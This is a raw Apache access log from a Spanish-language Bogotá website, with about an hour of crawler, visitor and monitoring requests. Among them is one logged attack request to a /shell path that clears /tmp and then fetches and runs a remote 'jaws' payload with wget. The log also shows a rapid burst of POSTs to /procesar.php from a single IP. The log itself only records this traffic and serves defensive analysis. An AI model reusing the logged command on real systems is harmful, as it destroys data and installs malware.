88.214.25.61 - - [13/May/2023:13:51:02 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:02 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:03 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:03 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:03 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:03 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:04 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:04 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:04 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:04 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:05 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:05 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:05 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:05 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:06 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:06 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:06 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:06 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:07 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:07 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:07 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:07 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:08 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:08 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:08 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:08 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:09 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:09 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:09 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:09 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:10 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:10 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:10 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:10 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:11 -0500] "POST /procesar.php HTTP/1.1" 200 891
94.177.225.239 - - [13/May/2023:13:51:11 -0500] "GET /bogota-fashion-week-una-ventana-para-la-sostenibilidad-en-bogota.html HTTP/1.1" 200 754
104.165.198.111 - - [13/May/2023:13:51:11 -0500] "GET /bogota-fashion-week-una-ventana-para-la-sostenibilidad-en-bogota.html HTTP/1.1" 200 754
88.214.25.61 - - [13/May/2023:13:51:11 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:11 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:11 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:12 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:12 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:12 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:13 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:13 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:13 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:13 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:14 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:14 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:14 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:14 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:15 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:15 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:15 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:15 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:16 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:16 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:16 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:16 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:17 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:17 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:17 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:17 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:18 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:18 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:18 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:18 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:19 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:19 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:19 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:19 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:20 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:20 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:20 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:20 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:21 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:21 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:21 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:21 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:22 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:22 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:22 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:22 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:23 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:23 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:23 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:24 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:24 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:24 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:24 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:24 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:25 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:25 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:25 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:26 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:26 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:26 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:26 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:27 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:27 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:27 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:27 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:28 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:28 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:28 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:28 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:29 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:29 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:29 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:29 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:30 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:30 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:30 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:30 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:31 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:31 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:31 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:31 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:32 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:32 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:32 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:32 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:33 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:33 -0500] "POST /procesar.php HTTP/1.1" 200 891
173.252.79.15 - - [13/May/2023:13:51:33 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
88.214.25.61 - - [13/May/2023:13:51:33 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:33 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:34 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:34 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:34 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:35 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:35 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:35 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:35 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:36 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:36 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:36 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:36 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:37 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:37 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:37 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:37 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:38 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:38 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:38 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:38 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:39 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:39 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:39 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:39 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:40 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:40 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:40 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:40 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:41 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:41 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:41 -0500] "POST /procesar.php HTTP/1.1" 200 891
88.214.25.61 - - [13/May/2023:13:51:41 -0500] "POST /procesar.php HTTP/1.1" 200 891
14.189.158.86 - - [13/May/2023:13:51:51 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 5.255.111.128/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
116.202.35.116 - - [13/May/2023:13:51:56 -0500] "GET /bogota-fashion-week-una-ventana-para-la-sostenibilidad-en-bogota.html HTTP/1.1" 200 754
216.245.221.92 - - [13/May/2023:13:52:54 -0500] "HEAD / HTTP/1.1" 200 -
35.236.230.103 - - [13/May/2023:13:53:33 -0500] "GET /bogota-fashion-week-una-ventana-para-la-sostenibilidad-en-bogota.html HTTP/1.0" 200 754
207.46.13.211 - - [13/May/2023:13:54:01 -0500] "GET /BLA/resoluciones/AUTOS%202019/4549.pdf HTTP/1.1" 200 355653
172.22.2.4 - - [13/May/2023:13:53:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:13:53:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [13/May/2023:13:55:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [13/May/2023:13:57:54 -0500] "HEAD / HTTP/1.1" 200 -
209.38.251.148 - - [13/May/2023:13:58:32 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
207.46.13.211 - - [13/May/2023:13:59:41 -0500] "GET /BLA/resoluciones/AUTOS%202022/5000.pdf HTTP/1.1" 304 -
199.16.157.180 - - [13/May/2023:14:00:07 -0500] "GET /el-proximo-13-de-mayo-participa-del-global-big-day.html HTTP/1.1" 200 736
199.16.157.182 - - [13/May/2023:14:00:07 -0500] "GET /images/El-13-de-mayo-es-Global-Big-Day.jpg HTTP/1.1" 200 78896
172.22.2.4 - - [13/May/2023:13:58:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/May/2023:14:00:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:13:59:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57945
216.245.221.92 - - [13/May/2023:14:02:54 -0500] "HEAD / HTTP/1.1" 200 -
186.102.61.112 - - [13/May/2023:14:03:37 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18uBFSN9NZalWLUzKqrtCRl88X/7Gutt5v1Eus+jr5oJtAeGXqAW49G&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 30
186.102.61.112 - - [13/May/2023:14:03:37 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19YTWMSIR76Pq/Vdw1eER5VMf9ZaUcNNuRZSdx88Ul5on2W/zUqcfsGlGQQekKkUJb1azMQ8K8FuE0i3qJfzifd32s84ibLkqc=&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 97
186.102.61.112 - - [13/May/2023:14:03:37 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19LH/xFXGa9iawz+Cb3t/WzHEW9H7+6yZN9H2Pujd/63Epan0OcSRSM/0k3z5UJP9+IYsJNKaV9RLsmYvZVRsnwAOOOivDQAJZntTQ6Bd8I8SOef0r7w1k3H0Bg4E7on7KD6ln99tFybqRHuMQjr+en1GpJuTrBTlXu2xSnL7qff9vSLNelmUsXZ7ts7LSaB1B4LqdosTFprsJhl97QlOm+od+PxqvutYa7kRgzb8oL4GPMWP7CUkZRnO0jQ/pX4nCH+YU2TACiwL/raR0CykK9HjhqgcMbHrFqQOHJrv18bp3qfm4DuBPYuPJLgOgnHUK6deBZPh7a/uPsdQmLA/DrXbIRD93L3FLJkmFVne/puMjAkYwWyS18k6pJ9WVwGSIV3Pm3pfnVQuLiUhlM0Nb62TYodvTItGbch72JOEwCxXw22UHOiUf2En3pUA/sB+s0lbh0Lj4pFgFPi3dY/BlWGxRT0cxT06qTOrFTUIweDquS2Cvl9LeiYPRoBe7XVYT75+g/ffrJLArFjnG3BBbqYs/qDph+wVoAqFVRuMXZmmUYy850bErAjEWD4P2VsyHK2xsN1wK/Cd0qA+uxx2jezcCod9iFYiaFgOKVFtCywVdEIq/TrVd3JnCY1Lq1WNVDOEWfj7tnjvMmRALde91sjoiCAky9jNFRjNJHu6uBUk8EXZGYLpxpDryVD0hlmXm3htPl7NdnbIm7CctSxL21Y8XGGw624f30lca/N5lreHcf2FW9BHrQu0Op8FQk9KgO5hvhvggs6ugUQrgNW/dWNrvqsxwWkPg4UlP42PZxJbq/vMrD3S0T45wjSCXxHh/Yw698YEnUvaq3yGMAPvAgN2Sh4WZeQ8GgJ63k0JUsIVFErZCrFBpaugtHoy6wKnOuRRW0J+fQMbuDTF1qcvRyEHH6StiQj8Zs1I45bTD6huQrd+GbmNufQRKz1uYm8vqYTMHXhzB9015KDmnco5HaGMmZGmxYy2FtZtgDM7ZEq0D8vmMWB9x6RoyqhjWW7dkoYluObmFxcTsDEf549uZE9MiefMIYSz1S3hpyyvWdbtVfgoLg3CYi90GtjpJNVvUuJ/K5o4aXlit++dNnjOynHJflWiD0nPQXPYqAlZegqYc9E8iPPtxj/sOb19LF2CtSqPuglq3uNxVskf0eqr3uQxCGgm1ZZVxUWzmtf6dyfdYQhtbORjHpaE/Qna7m90ch6M4jk42ZogD0xndVkKbus796UnhMDVQMuK0XEuv4XSEMYzztn7Jn5tgDljc+x6FjorRkJ/ktxkPYCYZw9CWh3Iq9+iTFLo0kgdVUSGgC3jddMwbVvsa8VjghjyxzGzrf1NLdBhXF8vA7evS8QyCV55lFY3e//76/QzBWUi6g7upkyf1ozQotxqVETD0N4YdM89/WvUhJ5BP8gW/TGTUKJ2raO7fgVQynrYxkl1N5wyIDElujLNn0W59e1okM4YvhoqCENHXsqZ37YfsL/U0trd+Z6oPKK0wDdQ/VxOGsaJDKKiz7QKzJaSrCkU74PK9robxXu7Hd725Q4Ltl59UJqBGmo1M13JJ2zrVKD9QqMuxBCssj+bRvoOba37BCYmhF20dleZj25bWoF9ZlTA9Al6+IemsA8rE1uJsrNaD1tEuJ2hu2g/1K9KqotqikGFCykhaG88/ZYrSWIv6eVyANlT4ip/RsKefcKcQVzYqNg0JJjDxGeMR1XEJDKnRRNMUUjNwLaZJGgw0FM/CqOeDuuZYVLhBFm2Q=&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 403
186.102.61.112 - - [13/May/2023:14:03:37 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18MfURpowUhxTxYas2hyKUHLDVBU34O8PwOBJHTT1ZpmHLQMO81c8s23jnegUaPr+3Q1UJwisyjOmViXCGXBCMJD8M/NVe84Gza/HnWgmJeJloZjgCPXa5XdkcI23iut+ZEsaGL6hMl0GAeL/NQFDo1uxLPk+TD5BcUKBZPCGBMugKAPt/UJb38jUFvnbjuRMMbGD1687knWREU/irGdtz1KtxzCDjq4D4c4TWkDUQAZGgw6Tf5SdO3GVZqLlUhBm5GzEopCD4hXko7RpF0rjjyQyaVTrwDDio707pmgCXuKgHN1IoQVJr4Ja+KWUfsFpasyli8rEMVSuQV/5K7VSbGUVjkqziy8L/62kMSQuE8wruV5fJTUcAMj5k8Oy4Z5VOSnr9FBCuZetiLz4838voqvi+sFPWCj1b3cgzZSLQV+iHvuJ3rtKa2YTjPK5uP0y5AxBuyuswbN2nue+V+ulIwMB9I4pfXLW5+NT0IMP6pyjBhw5uYMsjPazriXarTmcEUE1LU+zr9mTiC5Lbw12T3lGsnuPLMeRlbwzvt/CoDOrwijOxtPBP751NCM5pq6A97L5YdwbbgGNDmId3VgZ2Fg6IkElWftkfsLXQN1hbE1dLRWnT5q7fLfbND2rCHRv/Et93fr8W5LQKUf92Imq0mpiHUsVScaGF+xCK1MitTcRby14FfxtrOWCg2EzDezwJu2jZ6kLZaHTminHD4MqdzYYW7WCHuAv9iEGMB8wcZfDt4rgcfrmu1&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 208
186.102.61.112 - - [13/May/2023:14:03:37 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18uBFSN9NZalWLUzKqrtCRl88X/7Gutt5v1Eus+jr5oJtAeGXqAW49G HTTP/1.1" 200 31032
66.249.66.72 - - [13/May/2023:14:04:26 -0500] "GET /bogota-fashion-week-una-ventana-para-la-sostenibilidad-en-bogota.html HTTP/1.1" 200 754
213.186.1.244 - - [13/May/2023:14:05:46 -0500] "GET /bogota-fashion-week-una-ventana-para-la-sostenibilidad-en-bogota.html HTTP/1.1" 200 754
201.245.192.253 - - [13/May/2023:14:05:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:14:04:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:05:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [13/May/2023:14:07:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [13/May/2023:14:10:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:14:10:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [13/May/2023:14:12:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:11:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
207.46.13.211 - - [13/May/2023:14:14:34 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
207.46.13.211 - - [13/May/2023:14:14:52 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
40.77.167.146 - - [13/May/2023:14:14:56 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
40.77.167.146 - - [13/May/2023:14:14:57 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
40.77.167.146 - - [13/May/2023:14:14:57 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
201.245.192.253 - - [13/May/2023:14:15:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
66.249.64.33 - - [13/May/2023:14:16:15 -0500] "-" 408 -
168.119.253.13 - - [13/May/2023:14:17:52 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [13/May/2023:14:17:54 -0500] "HEAD / HTTP/1.1" 200 -
34.140.248.32 - - [13/May/2023:14:18:05 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [13/May/2023:14:16:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:17:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
201.245.192.253 - - [13/May/2023:14:19:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40068
201.245.192.253 - - [13/May/2023:14:19:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44128
201.245.192.253 - - [13/May/2023:14:20:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
190.24.73.188 - - [13/May/2023:14:22:23 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13502
190.24.73.188 - - [13/May/2023:14:22:36 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 457959
216.245.221.92 - - [13/May/2023:14:22:54 -0500] "HEAD / HTTP/1.1" 200 -
190.90.132.138 - - [13/May/2023:14:23:22 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.90.132.138 - - [13/May/2023:14:23:22 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
190.90.132.138 - - [13/May/2023:14:23:22 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [13/May/2023:14:22:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:24:39 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
181.61.204.215 - - [13/May/2023:14:24:44 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
172.22.2.4 - - [13/May/2023:14:23:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
181.61.204.215 - - [13/May/2023:14:24:49 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 329829
207.46.13.211 - - [13/May/2023:14:25:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/1528.pdf HTTP/1.1" 304 -
201.245.192.253 - - [13/May/2023:14:25:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [13/May/2023:14:27:54 -0500] "HEAD / HTTP/1.1" 200 -
